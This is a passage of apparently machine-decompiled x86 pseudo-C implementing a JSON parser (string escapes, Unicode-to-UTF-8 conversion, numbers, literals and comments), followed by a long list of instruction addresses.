            										_t259 = _t669 + 4; // 0x4
            										_t394 = _t259;
            										_t670 =  *_t394;
            										_a4 = _t394;
            										if(_t670 == 1) {
            											st0 = _t712;
            											_t396 = _t590 - 9;
            											if(_t396 == 0) {
            												L240:
            												_t669 = _v16;
            												L241:
            												_t397 = _v80;
            												L242:
            												_t712 =  *0x9bfbc0;
            												_t567 =  &(_t567[1]);
            												_v76 = _t567;
            												if(_t567 != _v32) {
            													_t590 =  *_t567;
            												} else {
            													_t590 = 0;
            												}
            												goto L10;
            											}
            											_t527 = _t396 - 1;
            											if(_t527 == 0) {
            												_v72 = _v72 + 1;
            												_v68 = _v68 & 0x00000000;
            												goto L240;
            											}
            											_t528 = _t527 - 3;
            											if(_t528 == 0) {
            												goto L240;
            											}
            											_t529 = _t528 - 0x13;
            											if(_t529 == 0) {
            												goto L240;
            											}
            											_t531 = _t529;
            											if(_t531 == 0) {
            												if((_t642 & 0x00000004) != 0) {
            													L247:
            													_t568 = _v80;
            													_t405 =  !=  ? _v28 : _v36;
            													if(_t405 == 0) {
            														L249:
            														if(_t568 == 0) {
            															E009BC3EC( &_v104, _v28);
            														}
            														return 0;
            													} else {
            														goto L248;
            													}
            													do {
            														L248:
            														_t671 =  *((intOrPtr*)(_t405 + 0x10));
            														_v92(_t405);
            														_t405 = _t671;
            													} while (_t671 != 0);
            													goto L249;
            												}
            												_t669 = _v16;
            												_t642 = _t642 | 0x00000020;
            												_t664 = 0;
            												_v12 = _t642;
            												_a12 = 0;
            												_v24 =  *((intOrPtr*)(_t669 + 0x10));
            												L227:
            												if((_t642 & 0x00000002) != 0) {
            													_t642 = _t642 & 0xfffffffd;
            													_t567 = _t567 - 1;
            													_v12 = _t642;
            													_v76 = _t567;
            												}
            												if((_t642 & 0x00000001) != 0) {
            													_t410 =  *_t669;
            													_t644 = _t642 & 0xfffffffe | 0x00000004;
            													_t594 = _t644;
            													if(_t410 != 0) {
            														_t642 =  !=  ? _t594 : _t644 | 0x00000008;
            														_v12 = _t642;
            														if(_v80 == 0) {
            															_t596 =  *((intOrPtr*)(_t410 + 4)) - 1;
            															if(_t596 == 0) {
            																 *((intOrPtr*)( *(_t410 + 8) * 0xc +  *((intOrPtr*)(_t410 + 0xc)) + 8)) = _t669;
            															} else {
            																if(_t596 == 1) {
            																	 *((intOrPtr*)( *((intOrPtr*)(_t410 + 0xc)) +  *(_t410 + 8) * 4)) = _t669;
            																}
            															}
            														}
            														_t411 =  *_t669;
            														 *((intOrPtr*)(_t411 + 8)) =  *((intOrPtr*)(_t411 + 8)) + 1;
            														if( *((intOrPtr*)(_t411 + 8)) > _v112) {
            															goto L247;
            														} else {
            															_t669 =  *_t669;
            															_v16 = _t669;
            															_v20 = _t669;
            															goto L241;
            														}
            													}
            													_t642 = _t644 | 0x00000080;
            													L82:
            													_v12 = _t642;
            												}
            												goto L241;
            											}
            											_t533 = _t531 - 0xa;
            											if(_t533 == 0) {
            												if((_t642 & 0x00000004) == 0) {
            													goto L247;
            												}
            												_t642 = _t642 & 0xfffffffb;
            												L220:
            												_v12 = _t642;
            												L226:
            												_t669 = _v16;
            												goto L227;
            											}
            											if(_t533 != 0x51) {
            												goto L247;
            											}
            											_t642 = _t642 & 0xfffffffb | 0x00000001;
            											goto L220;
            										}
            										_t261 = _t670 - 3; // -3
            										if(_t261 > 1) {
            											st0 = _t712;
            											goto L226;
            										}
            										if(_t590 - 0x30 > 9) {
            											if(_t590 == 0x2b || _t590 == 0x2d) {
            												if((_t642 & 0x00000c00) != 0x400) {
            													goto L194;
            												}
            												st0 = _t712;
            												_t642 =  !=  ? _t642 | 0x00000800 : _t642 | 0x1800;
            												_v12 = _t642;
            												goto L240;
            											} else {
            												if(_t590 != 0x2e || _t670 != 3) {
            													L194:
            													if((_t642 & 0x00000400) != 0) {
            														if(_v40 == 0) {
            															L246:
            															st0 = _t712;
            															goto L247;
            														}
            														_t540 = _v52;
            														_t601 =  ~_t540;
            														_t541 =  !=  ?  ~_t540 : _t540;
            														 *_t691 = _t712;
            														E009BC452( !=  ?  ~_t540 : _t540,  ~_t540, _t642 & 0x00001000,  ~_t540, _t601,  !=  ?  ~_t540 : _t540);
            														_t669 = _v16;
            														_t691 =  &(_t691[1]);
            														_t642 = _v12;
            														 *(_t669 + 8) = _t712 *  *(_t669 + 8);
            														L206:
            														if((_t642 & 0x00000100) != 0) {
            															if( *_a4 != 3) {
            																asm("fchs");
            															} else {
            																 *(_t669 + 8) =  ~( *(_t669 + 8));
            																asm("adc eax, 0x0");
            																 *(_t669 + 0xc) =  ~( *(_t669 + 0xc));
            															}
            														}
            														_t642 = _t642 | 0x00000003;
            														L211:
            														_v12 = _t642;
            														goto L227;
            													}
            													if(_t670 != 4) {
            														_t669 = _v16;
            														st0 = _t712;
            														L199:
            														if(_t590 == 0x65 || _t590 == 0x45) {
            															_t546 = _a4;
            															_t648 = _t642 | 0x00000400;
            															if( *_t546 == 3) {
            																 *_t546 = 4;
            																asm("fild qword [esi+0x8]");
            																 *(_t669 + 8) = _t712;
            															}
            															_v40 = _v40 & 0x00000000;
            															_t642 = _t648 & 0xfffffdff;
            															goto L82;
            														} else {
            															goto L206;
            														}
            													}
            													_t547 = _v40;
            													if(_v40 == 0) {
            														goto L246;
            													}
            													asm("fild qword [ebp-0x3c]");
            													_v48 = _t712;
            													_t715 = _v48;
            													_v48 = _t715;
            													 *_t691 = _t715;
            													E009BC452(_t547, _t590, _t642, _t590, _t590, _t547);
            													asm("fdivr qword [ebp-0x2c]");
            													_t691 =  &(_t691[1]);
            													_t549 = _v16;
            													_t669 = _v20;
            													_t567 = _v76;
            													_t642 = _v12;
            													_t590 = _a11;
            													_v16 = _t669;
            													_t712 = _t715 +  *(_t549 + 8);
            													 *(_t549 + 8) = _t712;
            													goto L199;
            												} else {
            													st0 = _t712;
            													if(_v40 == 0) {
            														goto L247;
            													}
            													_t669 = _v16;
            													_v40 = _v40 & 0x00000000;
            													 *_a4 = 4;
            													asm("fild qword [esi+0x8]");
            													 *(_t669 + 8) = _t712;
            													goto L241;
            												}
            											}
            										}
            										st0 = _t712;
            										_t554 = _v40 + 1;
            										_v40 = _t554;
            										if(_t670 == 3) {
            											if((_t642 & 0x00000400) != 0) {
            												L185:
            												_t642 = _t642 | 0x00000800;
            												_v12 = _t642;
            												_v52 = _a11 + 0xffffffd0 + _v52 * 0xa;
            												goto L240;
            											}
            											if((0x00000200 & _t642) != 0) {
            												goto L247;
            											}
            											if(_t554 == 1 && _t590 == 0x30) {
            												_t642 = _t642 | 0x00000200;
            												_v12 = _t642;
            											}
            											asm("cdq");
            											_t665 = _t642;
            											_t561 = E009BC670( *((intOrPtr*)(_v16 + 8)),  *((intOrPtr*)(_v16 + 0xc)), 0xa, 0);
            											_t562 = _v16;
            											asm("adc edi, edx");
            											_t642 = _v12;
            											 *((intOrPtr*)(_t562 + 8)) = _t590 - 0x30 + _t561;
            											_t669 = _t562;
            											 *(_t669 + 0xc) = _t665;
            											_t664 = _a12;
            											goto L241;
            										}
            										if((_t642 & 0x00000400) != 0) {
            											goto L185;
            										}
            										asm("cdq");
            										_t666 = _t642;
            										_v64 = _t590 - 0x30 + E009BC670(_v64, _v60, 0xa, 0);
            										asm("adc edi, edx");
            										_t642 = _v12;
            										_v60 = _t666;
            										_t664 = _a12;
            										goto L240;
            									}
            									st0 = _t712;
            									_t399 = _t590 - 9;
            									if(_t399 == 0) {
            										goto L241;
            									}
            									_t400 = _t399 - 1;
            									if(_t400 == 0) {
            										L107:
            										_v72 = _v72 + 1;
            										_v68 = _v68 & 0x00000000;
            										goto L241;
            									}
            									_t401 = _t400 - 3;
            									if(_t401 == 0) {
            										goto L241;
            									}
            									_t402 = _t401 - 0x13;
            									if(_t402 == 0) {
            										goto L241;
            									}
            									if(_t402 == 0x3d) {
            										if(_t669 == 0 ||  *((intOrPtr*)(_t669 + 4)) != 2) {
            											goto L247;
            										} else {
            											_t642 = _t642 & 0xfffffff3 | 0x00000001;
            											goto L211;
            										}
            									}
            									if((_t642 & 0x00000004) == 0) {
            										if((_t642 & 0x00000040) == 0) {
            											_v12 = _t642 & 0xfffffff7;
            											if(_t590 == 0x22) {
            												_t419 = E009BC497( &_v116,  &_v20,  &_v28,  &_v36, 5); // executed
            												_t691 =  &(_t691[2]);
            												if(_t419 == 0) {
            													goto L247;
            												}
            												_t669 = _v20;
            												_t567 = _v76;
            												_t642 = _v12 | 0x00000020;
            												_t664 = 0;
            												_v12 = _t642;
            												_v16 = _t669;
            												_v24 =  *(_t669 + 0xc);
            												_a12 = 0;
            												goto L241;
            											}
            											if(_t590 == 0x5b) {
            												_t424 = E009BC497( &_v116,  &_v20,  &_v28,  &_v36, 2);
            												_t691 =  &(_t691[2]);
            												if(_t424 == 0) {
            													goto L247;
            												}
            												_t669 = _v20;
            												_t642 = _v12 | 0x00000008;
            												_t567 = _v76;
            												_v12 = _t642;
            												_v16 = _t669;
            												goto L241;
            											}
            											if(_t590 == 0x66) {
            												if(_v32 - _t567 < 4) {
            													goto L247;
            												}
            												_t569 =  &(_t567[1]);
            												_v76 = _t569;
            												if( *_t569 != 0x61) {
            													goto L247;
            												}
            												_t570 =  &(_t569[1]);
            												_v76 = _t570;
            												if( *_t570 != 0x6c) {
            													goto L247;
            												}
            												_t571 =  &(_t570[1]);
            												_v76 = _t571;
            												if( *_t571 != 0x73) {
            													goto L247;
            												}
            												_t572 =  &(_t571[1]);
            												_v76 = _t572;
            												if( *_t572 != 0x65) {
            													goto L247;
            												}
            												_push(6);
            												L164:
            												_push( &_v36);
            												_push( &_v28);
            												_push( &_v20);
            												_push( &_v116);
            												_t431 = E009BC497();
            												_t691 =  &(_t691[2]);
            												if(_t431 == 0) {
            													goto L247;
            												}
            												_t669 = _v20;
            												_t642 = _v12 | 0x00000001;
            												_t567 = _v76;
            												_v12 = _t642;
            												_v16 = _t669;
            												goto L227;
            											}
            											if(_t590 == 0x6e) {
            												if(_v32 - _t567 < 3) {
            													goto L247;
            												}
            												_t573 =  &(_t567[1]);
            												_v76 = _t573;
            												if( *_t573 != 0x75) {
            													goto L247;
            												}
            												_t574 =  &(_t573[1]);
            												_v76 = _t574;
            												if( *_t574 != 0x6c) {
            													goto L247;
            												}
            												_t575 =  &(_t574[1]);
            												_v76 = _t575;
            												if( *_t575 != 0x6c) {
            													goto L247;
            												}
            												_push(7);
            												goto L164;
            											}
            											if(_t590 == 0x74) {
            												if(_v32 - _t567 < 3) {
            													goto L247;
            												}
            												_t576 =  &(_t567[1]);
            												_v76 = _t576;
            												if( *_t576 != 0x72) {
            													goto L247;
            												}
            												_t577 =  &(_t576[1]);
            												_v76 = _t577;
            												if( *_t577 != 0x75) {
            													goto L247;
            												}
            												_t578 =  &(_t577[1]);
            												_v76 = _t578;
            												if( *_t578 != 0x65) {
            													goto L247;
            												}
            												_t440 = E009BC497( &_v116,  &_v20,  &_v28,  &_v36, 6);
            												_t691 =  &(_t691[2]);
            												if(_t440 == 0) {
            													goto L247;
            												}
            												_t669 = _v20;
            												_t567 = _v76;
            												_t642 = _v12 | 1;
            												_v16 = _t669;
            												 *(_t669 + 8) = 1;
            												_v12 = _t642;
            												goto L227;
            											}
            											if(_t590 == 0x7b) {
            												_t447 = E009BC497( &_v116,  &_v20,  &_v28,  &_v36, 1);
            												_t691 =  &(_t691[2]);
            												if(_t447 == 0) {
            													goto L247;
            												}
            												_t669 = _v20;
            												_t567 = _v76;
            												_t642 = _v12;
            												_v16 = _t669;
            												goto L241;
            											}
            											if(_t590 < 0x30 || _t590 > 0x39) {
            												if(_t590 != 0x2d) {
            													goto L247;
            												}
            												goto L129;
            											} else {
            												L129:
            												_t452 = E009BC497( &_v116,  &_v20,  &_v28,  &_v36, 3);
            												_t691 =  &(_t691[2]);
            												if(_t452 == 0) {
            													goto L247;
            												}
            												_t567 = _v76;
            												if(_v80 != 0) {
            													_v40 = _v40 & 0x00000000;
            													_t658 = _v12 & 0xffffe0ff;
            													_v64 = _v64 & 0x00000000;
            													_v60 = _v60 & 0x00000000;
            													_v52 = _v52 & 0x00000000;
            													_t669 = _v20;
            													_v16 = _t669;
            													if(_a11 == 0x2d) {
            														_t642 = _t658 | 0x00000100;
            														goto L82;
            													}
            													_t642 = _t658 | 0x00000002;
            													goto L211;
            												}
            												_t453 = _a11;
            												_t667 = _v32;
            												L132:
            												while(1) {
            													if(_t453 < 0x30 || _t453 > 0x39) {
            														if(_t453 == 0x2b || _t453 == 0x2d || _t453 == 0x65 || _t453 == 0x45 || _t453 == 0x2e) {
            															goto L139;
            														} else {
            															goto L141;
            														}
            													} else {
            														L139:
            														_t567 =  &(_t567[1]);
            														_v76 = _t567;
            														if(_t567 == _t667) {
            															L141:
            															_t669 = _v20;
            															_t642 = _v12 | 0x00000003;
            															_t664 = _a12;
            															_v12 = _t642;
            															_v16 = _t669;
            															goto L227;
            														}
            														_t453 =  *_t567;
            														continue;
            													}
            												}
            											}
            										}
            										if(_t590 != 0x3a) {
            											goto L247;
            										}
            										_t642 = _t642 & 0xffffffbf;
            										goto L82;
            									}
            									if(_t590 != 0x2c) {
            										goto L247;
            									}
            									_t642 = _t642 & 0xfffffffb;
            									goto L82;
            								}
            								if(_t590 == 0) {
            									_t372 =  &_v80;
            									 *_t372 = _v80 - 1;
            									_t454 = _v28;
            									_v36 = _t454;
            									if( *_t372 < 0) {
            										st0 = _t712;
            										return _t454;
            									}
            									_t397 = _v80;
            									_t567 = _v56;
            									goto L6;
            								}
            								st0 = _t712;
            								_t456 = _t590 - 9;
            								if(_t456 == 0) {
            									goto L241;
            								}
            								_t457 = _t456 - 1;
            								if(_t457 == 0) {
            									goto L107;
            								}
            								_t458 = _t457 - 3;
            								if(_t458 == 0) {
            									goto L241;
            								}
            								if(_t458 != 0x13) {
            									goto L247;
            								}
            								goto L241;
            							}
            							if((_t642 & 0x00006000) == 0) {
            								if(_t590 != 0x2f) {
            									goto L100;
            								}
            								st0 = _t712;
            								if((_t642 & 0x00000088) != 0 ||  *((intOrPtr*)(_t669 + 4)) == 1) {
            									_t567 =  &(_t567[1]);
            									_v76 = _t567;
            									if(_t567 == _v32) {
            										goto L247;
            									}
            									_t460 =  *_t567;
            									if(_t460 == 0x2a) {
            										_t642 = _t642 | 0x00004000;
            										goto L82;
            									}
            									if(_t460 != 0x2f) {
            										goto L247;
            									}
            									_t642 = _t642 | 0x00002000;
            									goto L82;
            								} else {
            									goto L247;
            								}
            							}
            							if((_t642 & 0x00002000) == 0) {
            								if((_t642 & 0x00004000) == 0) {
            									goto L100;
            								}
            								st0 = _t712;
            								if(_t590 == 0) {
            									goto L247;
            								}
            								if(_t590 != 0x2a) {
            									goto L242;
            								}
            								if(_t567 >= _v32 - 1) {
            									goto L241;
            								}
            								_t397 = _v80;
            								if(_t567[1] == 0x2f) {
            									_t642 = _t642 & 0xffffbfff;
            									_t567 =  &(_t567[1]);
            									_v12 = _t642;
            								}
            								goto L242;
            							}
            							st0 = _t712;
            							if(_t590 == 0xd || _t590 == 0xa || _t590 == 0) {
            								_t642 = _t642 & 0xffffdfff;
            								_t567 = _t567 - 1;
            								_v12 = _t642;
            							}
            							goto L242;
            						}
            						if(_t590 == 0 || _t664 > _v112) {
            							goto L246;
            						} else {
            							if((_t642 & 0x00000010) == 0) {
            								if(_t590 != 0x5c) {
            									if(_t590 != 0x22) {
            										st0 = _t712;
            										L84:
            										if(_t397 == 0) {
            											 *((char*)(_t664 + _v24)) = _t590;
            											_t669 = _v16;
            										}
            										L62:
            										_t664 = _t664 + 1;
            										_a12 = _t664;
            										goto L242;
            									}
            									if(_t397 == 0) {
            										 *((char*)(_t664 + _v24)) = 0;
            									}
            									_t642 = _t642 & 0xffffffdf;
            									_v24 = _v24 & 0x00000000;
            									_v12 = _t642;
            									_t462 =  *((intOrPtr*)(_t669 + 4)) - 1;
            									if(_t462 == 0) {
            										st0 = _t712;
            										if(_v80 == 0) {
            											 *((intOrPtr*)( *(_t669 + 8) * 0xc +  *(_t669 + 0xc))) =  *((intOrPtr*)(_t669 + 0x10));
            											_t642 = _v12;
            											 *( *(_t669 + 8) * 0xc +  *(_t669 + 0xc) + 4) = _t664;
            											_t142 = _t664 + 1; // 0x9
            											 *((intOrPtr*)(_t669 + 0x10)) =  *((intOrPtr*)(_t669 + 0x10)) + _t142;
            										} else {
            											_t130 = _t664 + 1; // 0x9
            											 *(_t669 + 0xc) =  *(_t669 + 0xc) + _t130;
            										}
            										_t642 = _t642 | 0x00000048;
            										goto L82;
            									} else {
            										_t397 = _v80;
            										if(_t462 == 4) {
            											_t642 = _t642 | 0x00000001;
            											 *(_t669 + 8) = _t664;
            											_v12 = _t642;
            										}
            										goto L71;
            									}
            								}
            								_t642 = _t642 | 0x00000010;
            								st0 = _t712;
            								_v12 = _t642;
            								goto L242;
            							}
            							_t642 = _t642 & 0xffffffef;
            							_v12 = _t642;
            							st0 = _t712;
            							_t469 = _t590 - 0x62;
            							if(_t469 == 0) {
            								_t397 = _v80;
            								if(_t397 == 0) {
            									 *((char*)(_t664 + _v24)) = 8;
            								}
            								goto L62;
            							}
            							_t472 = _t469 - 4;
            							if(_t472 == 0) {
            								_t397 = _v80;
            								if(_t397 == 0) {
            									 *((char*)(_t664 + _v24)) = 0xc;
            								}
            								goto L62;
            							}
            							_t473 = _t472 - 8;
            							if(_t473 == 0) {
            								_t397 = _v80;
            								if(_t397 == 0) {
            									 *((char*)(_t664 + _v24)) = 0xa;
            								}
            								goto L62;
            							}
            							_t474 = _t473 - 4;
            							if(_t474 == 0) {
            								_t397 = _v80;
            								if(_t397 == 0) {
            									 *((char*)(_t664 + _v24)) = 0xd;
            								}
            								goto L62;
            							}
            							_t476 = _t474;
            							if(_t476 == 0) {
            								_t397 = _v80;
            								if(_t397 == 0) {
            									 *((char*)(_t664 + _v24)) = 9;
            								}
            								goto L62;
            							}
            							if(_t476 == 1) {
            								if(_v32 - _t567 <= 4) {
            									goto L247;
            								}
            								_t579 =  &(_t567[1]);
            								_v76 = _t579;
            								_t481 = E009BB716( *_t579 & 0x000000ff);
            								_a11 = _t481;
            								if(_t481 == 0xff) {
            									goto L247;
            								}
            								_t580 =  &(_t579[1]);
            								_v76 = _t580;
            								_t482 = E009BB716( *_t580 & 0x000000ff);
            								_a15 = _t482;
            								if(_t482 == 0xff) {
            									goto L247;
            								}
            								_t581 =  &(_t580[1]);
            								_v76 = _t581;
            								_t483 = E009BB716( *_t581 & 0x000000ff);
            								_a7 = _t483;
            								if(_t483 == 0xff) {
            									goto L247;
            								}
            								_t567 =  &(_t581[1]);
            								_v76 = _t567;
            								_t484 = E009BB716( *_t567 & 0x000000ff);
            								_v5 = _t484;
            								if(_t484 == 0xff) {
            									goto L247;
            								}
            								_t674 = _a11 << 0x00000004 & 0x000000ff | _a15 & 0x000000ff;
            								_v44 = _t674;
            								_t624 = _t674 << 0x00000008 | _a7 << 0x00000004 & 0x000000ff | _v5 & 0x000000ff;
            								_v44 = _t624;
            								if((_t624 & 0x0000f800) != 0xd800) {
            									L35:
            									_t397 = _v80;
            									if(_t624 > 0x7f) {
            										if(_t624 > 0x7ff) {
            											if(_t624 > 0xffff) {
            												if(_t397 == 0) {
            													_t675 = _v24;
            													 *(_t664 + _t675) = _t624 >> 0x00000012 | 0x000000f0;
            													 *(_t664 + _t675 + 1) = _t624 >> 0x0000000c & 0x0000003f | 0x00000080;
            													 *(_t664 + _t675 + 2) = _t624 >> 0x00000006 & 0x0000003f | 0x00000080;
            													 *(_t664 + _t675 + 3) = _t624 & 0x0000003f | 0x00000080;
            													_t664 = _t664 + 4;
            													L44:
            													_a12 = _t664;
            													goto L240;
            												}
            												_t664 = _t664 + 4;
            												goto L39;
            											}
            											if(_t397 == 0) {
            												_t676 = _v24;
            												 *(_t664 + _t676) = _t624 >> 0x0000000c | 0x000000e0;
            												 *(_t664 + _t676 + 1) = _t624 >> 0x00000006 & 0x0000003f | 0x00000080;
            												 *(_t664 + _t676 + 2) = _t624 & 0x0000003f | 0x00000080;
            												_t664 = _t664 + 3;
            												goto L44;
            											} else {
            												_t664 = _t664 + 3;
            												goto L39;
            											}
            										}
            										if(_t397 == 0) {
            											_t677 = _v24;
            											 *(_t664 + _t677) = _t624 >> 0x00000006 | 0x000000c0;
            											 *(_t664 + _t677 + 1) = _t624 & 0x0000003f | 0x00000080;
            											_t664 = _t664 + 2;
            											goto L44;
            										} else {
            											_t664 = _t664 + 2;
            											goto L39;
            										}
            									} else {
            										if(_t397 == 0) {
            											 *(_t664 + _v24) = _t624;
            										}
            										_t664 = _t664 + 1;
            										L39:
            										_t669 = _v16;
            										_a12 = _t664;
            										goto L242;
            									}
            								}
            								if(_v32 - _t567 <= 6) {
            									goto L247;
            								}
            								_t582 =  &(_t567[1]);
            								_v76 = _t582;
            								if( *_t582 != 0x5c) {
            									goto L247;
            								}
            								_t583 =  &(_t582[1]);
            								_v76 = _t583;
            								if( *_t583 != 0x75) {
            									goto L247;
            								}
            								_t584 =  &(_t583[1]);
            								_v76 = _t584;
            								if(E009BB716( *_t584 & 0x000000ff) == 0xff) {
            									goto L247;
            								}
            								_t585 =  &(_t584[1]);
            								_v76 = _t585;
            								_t519 = E009BB716( *_t585 & 0x000000ff);
            								_a11 = _t519;
            								if(_t519 == 0xff) {
            									goto L247;
            								}
            								_t586 =  &(_t585[1]);
            								_v76 = _t586;
            								_t520 = E009BB716( *_t586 & 0x000000ff);
            								_a15 = _t520;
            								if(_t520 == 0xff) {
            									goto L247;
            								}
            								_t567 =  &(_t586[1]);
            								_v76 = _t567;
            								_t521 = E009BB716( *_t567 & 0x000000ff);
            								_a7 = _t521;
            								if(_t521 == 0xff) {
            									goto L247;
            								} else {
            									_t683 = (_v44 & 0x000003bf | 0x00000040) << 0x00000002 | _a11 & 3;
            									_v44 = _t683;
            									_t624 = _t683 << 0x00000008 | _a15 << 0x00000004 & 0x000000ff | _a7 & 0x000000ff;
            									goto L35;
            								}
            							} else {
            								_t397 = _v80;
            								goto L84;
            							}
            						}
            					}
            				}
            			}
            0x009bc134
            0x009bc178
            0x00000000
            0x00000000
            0x009bc17c
            0x009bc18e
            0x009bc191
            0x00000000
            0x009bc13b
            0x009bc13e
            0x009bc199
            0x009bc19f
            0x009bc224
            0x009bc3b1
            0x009bc3b1
            0x00000000
            0x009bc3b1
            0x009bc22a
            0x009bc22f
            0x009bc237
            0x009bc23d
            0x009bc240
            0x009bc245
            0x009bc248
            0x009bc24b
            0x009bc251
            0x009bc254
            0x009bc25a
            0x009bc262
            0x009bc27c
            0x009bc264
            0x009bc26c
            0x009bc26f
            0x009bc274
            0x009bc274
            0x009bc262
            0x009bc281
            0x009bc284
            0x009bc284
            0x00000000
            0x009bc284
            0x009bc1a4
            0x009bc1e8
            0x009bc1eb
            0x009bc1ed
            0x009bc1f0
            0x009bc1f7
            0x009bc1fa
            0x009bc203
            0x009bc205
            0x009bc20b
            0x009bc20e
            0x009bc20e
            0x009bc211
            0x009bc215
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x009bc1f0
            0x009bc1a6
            0x009bc1ab
            0x00000000
            0x00000000
            0x009bc1b1
            0x009bc1b7
            0x009bc1ba
            0x009bc1bd
            0x009bc1c0
            0x009bc1c3
            0x009bc1c8
            0x009bc1cb
            0x009bc1ce
            0x009bc1d1
            0x009bc1d4
            0x009bc1d7
            0x009bc1da
            0x009bc1dd
            0x009bc1e0
            0x009bc1e3
            0x00000000
            0x009bc145
            0x009bc149
            0x009bc14b
            0x00000000
            0x00000000
            0x009bc154
            0x009bc157
            0x009bc15b
            0x009bc161
            0x009bc164
            0x00000000
            0x009bc164
            0x009bc13e
            0x009bc134
            0x009bc072
            0x009bc074
            0x009bc075
            0x009bc07b
            0x009bc0be
            0x009bc113
            0x009bc117
            0x009bc124
            0x009bc129
            0x00000000
            0x009bc129
            0x009bc0c7
            0x00000000
            0x00000000
            0x009bc0d0
            0x009bc0d7
            0x009bc0d9
            0x009bc0d9
            0x009bc0e2
            0x009bc0e5
            0x009bc0f4
            0x009bc0fb
            0x009bc0fe
            0x009bc100
            0x009bc103
            0x009bc106
            0x009bc108
            0x009bc10b
            0x00000000
            0x009bc10b
            0x009bc083
            0x00000000
            0x00000000
            0x009bc099
            0x009bc09c
            0x009bc0a5
            0x009bc0a8
            0x009bc0aa
            0x009bc0ad
            0x009bc0b0
            0x00000000
            0x009bc0b0
            0x009bbd04
            0x009bbd06
            0x009bbd09
            0x00000000
            0x00000000
            0x009bbd0f
            0x009bbd12
            0x009bbcec
            0x009bbcec
            0x009bbcef
            0x00000000
            0x009bbcef
            0x009bbd14
            0x009bbd17
            0x00000000
            0x00000000
            0x009bbd1d
            0x009bbd20
            0x00000000
            0x00000000
            0x009bbd29
            0x009bc02b
            0x00000000
            0x009bc03b
            0x009bc03e
            0x00000000
            0x009bc03e
            0x009bc02b
            0x009bbd32
            0x009bbd48
            0x009bbd5e
            0x009bbd64
            0x009bbff7
            0x009bbffc
            0x009bc001
            0x00000000
            0x00000000
            0x009bc007
            0x009bc00d
            0x009bc010
            0x009bc013
            0x009bc015
            0x009bc01b
            0x009bc01e
            0x009bc021
            0x00000000
            0x009bc021
            0x009bbd6d
            0x009bbfbe
            0x009bbfc3
            0x009bbfc8
            0x00000000
            0x00000000
            0x009bbfd1
            0x009bbfd4
            0x009bbfd7
            0x009bbfda
            0x009bbfdd
            0x00000000
            0x009bbfdd
            0x009bbd76
            0x009bbf39
            0x00000000
            0x00000000
            0x009bbf3f
            0x009bbf40
            0x009bbf46
            0x00000000
            0x00000000
            0x009bbf4c
            0x009bbf4d
            0x009bbf53
            0x00000000
            0x00000000
            0x009bbf59
            0x009bbf5a
            0x009bbf60
            0x00000000
            0x00000000
            0x009bbf66
            0x009bbf67
            0x009bbf6d
            0x00000000
            0x00000000
            0x009bbf73
            0x009bbf75
            0x009bbf78
            0x009bbf7c
            0x009bbf80
            0x009bbf84
            0x009bbf85
            0x009bbf8a
            0x009bbf8f
            0x00000000
            0x00000000
            0x009bbf98
            0x009bbf9b
            0x009bbf9e
            0x009bbfa1
            0x009bbfa4
            0x00000000
            0x009bbfa4
            0x009bbd7f
            0x009bbf00
            0x00000000
            0x00000000
            0x009bbf06
            0x009bbf07
            0x009bbf0d
            0x00000000
            0x00000000
            0x009bbf13
            0x009bbf14
            0x009bbf1a
            0x00000000
            0x00000000
            0x009bbf20
            0x009bbf21
            0x009bbf27
            0x00000000
            0x00000000
            0x009bbf2d
            0x00000000
            0x009bbf2d
            0x009bbd88
            0x009bbe8d
            0x00000000
            0x00000000
            0x009bbe93
            0x009bbe94
            0x009bbe9a
            0x00000000
            0x00000000
            0x009bbea0
            0x009bbea1
            0x009bbea7
            0x00000000
            0x00000000
            0x009bbead
            0x009bbeae
            0x009bbeb4
            0x00000000
            0x00000000
            0x009bbecc
            0x009bbed1
            0x009bbed6
            0x00000000
            0x00000000
            0x009bbedc
            0x009bbee5
            0x009bbee8
            0x009bbeea
            0x009bbeed
            0x009bbef0
            0x00000000
            0x009bbef0
            0x009bbd91
            0x009bbe64
            0x009bbe69
            0x009bbe6e
            0x00000000
            0x00000000
            0x009bbe74
            0x009bbe77
            0x009bbe7a
            0x009bbe7d
            0x00000000
            0x009bbe7d
            0x009bbd9a
            0x009bbda4
            0x00000000
            0x00000000
            0x00000000
            0x009bbdaa
            0x009bbdaa
            0x009bbdbc
            0x009bbdc1
            0x009bbdc6
            0x00000000
            0x00000000
            0x009bbdd0
            0x009bbdd3
            0x009bbe1d
            0x009bbe21
            0x009bbe27
            0x009bbe2b
            0x009bbe2f
            0x009bbe37
            0x009bbe3a
            0x009bbe3d
            0x009bbe47
            0x00000000
            0x009bbe47
            0x009bbe3f
            0x00000000
            0x009bbe3f
            0x009bbdd5
            0x009bbdd8
            0x00000000
            0x009bbddb
            0x009bbddd
            0x009bbde5
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x009bbdf7
            0x009bbdf7
            0x009bbdf7
            0x009bbdf8
            0x009bbdfd
            0x009bbe03
            0x009bbe06
            0x009bbe09
            0x009bbe0c
            0x009bbe0f
            0x009bbe12
            0x00000000
            0x009bbe12
            0x009bbdff
            0x00000000
            0x009bbdff
            0x009bbddd
            0x009bbddb
            0x009bbd9a
            0x009bbd4d
            0x00000000
            0x00000000
            0x009bbd53
            0x00000000
            0x009bbd53
            0x009bbd37
            0x00000000
            0x00000000
            0x009bbd3d
            0x00000000
            0x009bbd3d
            0x009bbcbc
            0x009bc396
            0x009bc396
            0x009bc39a
            0x009bc39d
            0x009bc3a0
            0x009bc3ad
            0x00000000
            0x009bc3ad
            0x009bc3a2
            0x009bc3a5
            0x00000000
            0x009bc3a5
            0x009bbcc5
            0x009bbcc7
            0x009bbcca
            0x00000000
            0x00000000
            0x009bbcd0
            0x009bbcd3
            0x00000000
            0x00000000
            0x009bbcd5
            0x009bbcd8
            0x00000000
            0x00000000
            0x009bbce1
            0x00000000
            0x00000000
            0x00000000
            0x009bbce7
            0x009bbba3
            0x009bbc72
            0x00000000
            0x00000000
            0x009bbc74
            0x009bbc79
            0x009bbc85
            0x009bbc86
            0x009bbc8c
            0x00000000
            0x00000000
            0x009bbc92
            0x009bbc96
            0x009bbcab
            0x00000000
            0x009bbcab
            0x009bbc9a
            0x00000000
            0x00000000
            0x009bbca0
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x009bbc79
            0x009bbbaf
            0x009bbc2e
            0x00000000
            0x00000000
            0x009bbc34
            0x009bbc38
            0x00000000
            0x00000000
            0x009bbc41
            0x00000000
            0x00000000
            0x009bbc4d
            0x00000000
            0x00000000
            0x009bbc57
            0x009bbc5a
            0x009bbc60
            0x009bbc66
            0x009bbc67
            0x009bbc67
